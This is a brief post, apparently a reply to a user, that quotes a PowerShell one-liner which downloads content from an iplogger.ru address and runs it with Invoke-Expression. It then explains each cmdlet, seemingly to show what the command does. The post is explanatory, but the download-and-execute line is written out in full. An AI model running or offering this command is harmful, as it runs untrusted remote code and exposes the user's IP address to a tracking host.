@iorilu iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content
iex Invoke-Expression Runs commands or expressions on the local computer.
iwr Invoke-WebRequest Gets content from a web page on the internet.
-UseBasicParsing This parameter has been deprecated. Beginning with PowerShell 6.0.0, all Web requests use basic parsing only. This parameter is included for backwards compatibility only and any use of it has no effect on the operation of the cmdlet. |